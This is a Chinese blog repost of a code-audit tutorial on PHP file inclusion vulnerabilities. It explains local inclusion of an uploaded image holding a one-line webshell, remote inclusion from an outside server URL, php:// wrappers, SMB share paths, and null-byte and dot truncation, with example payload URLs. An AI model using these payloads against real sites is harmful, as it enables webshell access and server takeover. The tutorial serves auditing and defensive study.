代码审计的艺术系列—第九篇

最新推荐文章于 2022-07-01 10:30:21 发布
最新推荐文章于 2022-07-01 10:30:21 发布
阅读量991 收藏 2
点赞数
文章标签: 信息安全 php 代码审计

0x00前言:

作者:HackBraid,乌云核心白帽子。 文件包含漏洞也是一种非常常见的漏洞类型,产生的原因是传入的文件名没有经过合理的校验,从而让黑客包含了精心构造的文件最终造成的代码注入。所以一套源码快速发掘并利用文件包含getshell是这篇要讨论的,主要分为危险函数、本地文件包含、远程文件包含和截断技巧四方面展开。

0x01危险函数:

include()include_once()require()require_once()

0x02文件包含漏洞的脑图: 

fileinclude

0x03 本地文件包含 :

本地文件包含漏洞常用的场景是用户上传头像image.jpg,image.jpg里存在PHP一句话木马,然后我们利用本地文件包含将image.jpg加载进来即可执行一句话命令从而getshell。缺陷代码如下: fileincludeyuan程序本意是获取action并引入action里的功能函数,这里我们上传了头像image.jpg,然后包含进来发现在页面显示了phpinfo的信息: fileinclude2那么这里上传的头像image.jpg代码改为一句话木马: fileincludeyuan1使用菜刀成功getshell: fileinclude1

0x04 远程文件包含 :

1.普通远程文件包含 条件:allow_url_include=on(默认off)、allow_url_fopen=on缺陷代码: fileincludeyuan2然后我们浏览器输入:http://localhost/fileinclude.php?action=http://*.*.*.*/test.txt fileinclude1其中http://*.*.*.*/test.txt是我自己的服务器,里面的test.txt内容如下: fileincludeyuan3当然也可以包含一句话木马进一步getshell。 2.有限制远程文件包含 条件:allow_url_include=on
伪协议php://input和php://filter包含测试发现可以继续愉快的包含了 fileinclude2 包含共享文件
这种情况是你可以传到文件到内网某台服务器192.168.1.102,假如这台服务器是ftp是开了共享的就可以通过下面方法进行包含:

http://localhost/fileinclude.php?action=\\192.168.1.102\share\test.txt


0x05 截断技巧 :

1.PHP%00截断截断条件:
①PHP版本小于5.3.4,详情请查看[CVE-2006-7243](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7243)
②magic_quotes_gpc=Off,否则%00这种空字符会被转义为\0
搭建好满足上面两个条件的测试环境后,可以用下面的漏洞代码来测试: fileincludeyuan4不同之处是这里后面强制加了jpg的后缀,所以需要通过截断的技巧来继续包含 fileinclude3 2.多个./截断截断条件:PHP版本小于5.3
Windows240个.或者./可以截断
测试240个点截断成功如下图: fileinclude4Linux是2038个/.可以截断,自行搭建环境测试吧~本篇的内容,我们就介绍到这里,下一篇欢迎持续关注。

原创文章,转载请注明: 转载自安兔|anntoo.com 互联网安全新媒体平台

本文链接地址: 代码审计的艺术系列-第九篇

煜铭2011
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ 代码审计篇资源 ] SQL 注入案例源码
12-25
[ 代码审计篇资源 ] eclipse_64绿色版免安装 [ 代码审计篇 ] 代码审计案例详解中讲到的知识点最好还是自己搭建环境实践一下。 详情可以看我的文章:[ 代码审计篇 ] 代码审计案例详解(一) SQL注入代码审计案例
【文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
m0_64378913的博客
06-15 2804
概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。定义:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的
PHP文件上传漏洞
baidu_41871794的博客
11-01 2550
PHP文件上传漏洞: 在PHP版本小于5.3.4的move_uploaded_file()函数中,存在CVE-2006-7243这个漏洞。 -形成原因:move_uploaded_file()底层源码用c编写,判断上传文件路径的时候使用了char指针,C语言中char指针以\0作为字符串结束的标志,所以会文件名被\0截断。\0后面的内容会被忽略。 这里的问题是,可以在文件名中插入空字符,利...
C#代码审计实战+前置知识
热门推荐
赵花花08042的博客
07-01 4万+
C# 基于 C 和 C++ 编程语言,是一个简单的、现代的、通用的、面向对象的编程语言,它是由微软(Microsoft)开发的,由 Ecma 和 ISO 核准认可的。C# 是由 Anders Hejlsberg 和他的团队在 .Net 框架开发期间开发的。C# 是专为公共语言基础结构(CLI)设计的。CLI 由可执行代码和运行时环境组成,允许在不同的计算机平台和体系结构上使用各种高级语言。...
代码安全审计工具推荐
煜铭2011
05-07 1万+
0×00 简介企业安全规划建设过程中,往往会涉及到开发的代码安全,而更多可以实现落地的是源代码安全审计中,使用自动化工具代替人工漏洞挖掘,并且可以交付给研发人员直接进行安全自查,同时也更符合SDL的原则,此外可以显著提高审计工作的效率。0×01 代码安全审计概述以下链接为当前比较热门的代码审计推荐文章,门类齐全,点评到位,很值得参考。http://www.freebuf.com/sec...
代码审计艺术系列—第六篇
煜铭2011
07-24 914
0x00前言: 作者:HackBraid,乌云核心白帽子。真名李斌,现汽车之家高级安全工程师。就职于奇虎360多年,熟悉代码审计、渗透测试等Web安全领域。白帽子分享之代码审计艺术系列(二、三、四季)是对绕过全局防护的场景进行的总结。没看前几季的同学,可以关注下。代码审计艺术系列—第一篇代码审计艺术系列—第二篇代码审计艺术系列—第三篇代码审计艺术系列—第四篇代码审计艺术系列—第五篇接
Java代码审计(入门篇).pdf
10-21
Java代码审计(入门篇).pdf
Seay源代码审计.exe
12-16
Seay源代码审计.exe
代码审计--源代码审计思路
02-24
但是同样会有很多弊端,通过逆向回溯的方式只能对通用漏洞进行快速审计,不能全面挖掘更有价值的漏洞,如果在时间允许的情况下,企业中安全运营对自身产品进行代码审计,就需要了解整个应用的业务逻辑,比如越权类...
PHP代码审计文档.zip
11-02
第9课:代码审计之命令执行漏洞mp4 第8课:代码审计之代码执行漏洞mp4 第7课:PHP代码审计宽字节注入及二次注入mp4 第6课:PHP代码审计SQL注入漏洞mp4 第5课:审计涉及的超全局变量mp4 第4课:代码调试及 Xdebug的...
代码审计工具V2.0.3源码20121015
01-16
代码审计工具V2.0.3源码 源码描述: 该版本目前支持单个关键字扫描、批量函数扫描、批量正则匹配,其中正则表达式扫描精确度最高,效率最高。 其他功能: 源码浏览:载入程序源码后,可以在最左边的程序文件列表里面点击浏览源码,扫描出包含关键字的源码,也可以在下边的列表点击直接浏览。代码可以直接复制,或者选择用记事本打开。 漏洞库:每次做代码审计可以在漏洞库建立一个审计文档,方便以后查阅、管理。 扫描配置:自定义扫描函数和正则表达式规则,针对要扫描的程序可以建立不同的规则,其中正则表达式扫描精确度更高。 审计技巧:收集了一下PHP代码审计的资料,提供给新手学习。 程序帮助:一些程序信息和作者信息
代码审计艺术系列—第三篇
煜铭2011
07-24 962
0x01 前言 非常感谢白帽子HackBraid同学一直坚持分享。:)接下来的时间交给HackBraid。 接白帽子分享之代码的艺术系列-第三篇,主要是一些函数的错误使用会引发SQL注入的场景以及二次注入漏洞产生的原因。如果没看之前的内容,建议先看看前两篇。:) 代码审计艺术系列—第一篇 白帽子分享之代码的艺术系列—第二篇 0x02 准备 知识储备:php基础、MySql入门 工具
代码审计艺术系列—第五篇
煜铭2011
07-24 1027
0x01前言 作者:HackBraid,乌云核心白帽子。白帽子分享之代码审计艺术系列(二、三、四季)是对绕过全局防护的场景进行的总结。没看前几季的同学,可以关注下。代码审计艺术系列—第一篇代码审计艺术系列—第二篇代码审计艺术系列—第三篇代码审计艺术系列—第四篇接下来两篇介绍全局防护存在的盲点,首先是上篇: 盲点如下: ①注入点类似id=1这种整型的参数就会完全无视GPC的过滤;
代码审计艺术系列—第一篇
煜铭2011
07-24 1113
0x01 前言 301:安全技术系列的文章还是啦,先会从一些初级的内容开始。:)近几年随着web安全人才的升级,越来越多的安全研究人员投入到php应用的漏洞挖掘,相应的代码安全问题也被大量的披露出来。身处这个时代,我有幸见识到身边白帽子不断寻求突破并丰富和完善了代码审计这个概念,时至今日笔者总结了一套基础的审计方法,厚着脸皮取名为代码审计艺术,希望能够帮助新人更好的认识和进入这一领域。 0x
[De1CTF2019]Mine Sweeping (C#代码审计
qq_45699846的博客
03-23 4473
[De1CTF2019]Mine Sweeping (C#代码审计、dnsPy、python绘图)
【windows】MS08-067——Windows 远程命令执行漏洞(CVE-2008-4250)
Kris__zhang的博客
05-11 1417
漏洞简介 CVE-2008-4250微软编号为MS08-067,根据微软安全漏洞公告,基本可以了解其原理: MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化(将路径字符串中的’/‘转换为’’,同时去除相对路径".“和”…"),而在NetpwPathCanonicalize函数
aspx代码审计-2
dfdhxb995397的博客
09-21 228
今天和大家分享一下aspx网站的代码审计,漏洞类型为:未授权访问和任意文件下载。 本文作者:i春秋签约作家——非主流 今天看的源码文件就不共享给大家了,本文只作学习只用。 还是先看我们的文件夹目录和dll文件的目录: 这是网站根目录 正常打开,是会跳转到/2052/aspx/userlogin.aspx Dll使用ILSpy反编译后,目录如下: 在代码审计中,类...
PHP任意文件上传漏洞
yanyanphp的专栏
04-03 1561
 安全研究人员今天发布了一个中危漏洞——PHP任意文件上传漏洞(CVE-2015-2348)。 在上传文件的时候只判断文件名是合法的文件名就断定这个文件不是恶意文件,这确实会导致其他安全问题。并且在这种情况下,在你自己的文件中检查漏洞很不现实,因为这个漏洞可以绕过你对文件名后缀、文件类型(Content-Type)、Mime type、文件大小等的检查,所以仅仅依靠这些检查是救不了你的。
php文件包含漏洞
渗透笔记
02-07 1069
1.文件包含的原理 1.1为什么要使用文件包含 将一些自定义函数或功能写在一个a文件内,当b文件中要使用到a文件内的一些函数或功能时,b文件只需要包含a文件,这样b文件就可以直接调用a文件内定义好的函数或一些功能,这样方便省事。 1.2相关测试代码 php文件包含代码 if ($_GET['file']) { include $_GET['file']; }els
java代码审计 入门篇
最新发布
08-24
对于Java代码审计,入门篇的几个重点包括: 1. 熟悉Java语言和开发框架:了解Java的基础知识和常见的开发框架,如Spring、Struts等。掌握Java的语法、面向对象编程、异常处理等内容。 2. 学习安全编码规范:掌握常见...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值